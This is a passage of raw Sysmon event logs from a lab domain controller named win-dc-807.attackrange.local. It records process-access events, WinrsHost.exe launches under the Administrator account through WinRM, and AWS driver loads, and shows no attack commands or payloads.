15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.847{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.848{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C8C-5FA1-5A39-040000000000}0x4395a0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.831{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C8C-5FA1-7600-000000008801}51164128C:\Windows\system32\conhost.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7600-000000008801}5116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.815{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.816{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C8C-5FA1-5639-040000000000}0x439560HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.800{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.488C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 644600x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.472C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.753{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7400-000000008801}4988C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.737{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C8C-5FA1-7400-000000008801}4988C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.737{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7400-000000008801}4988C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 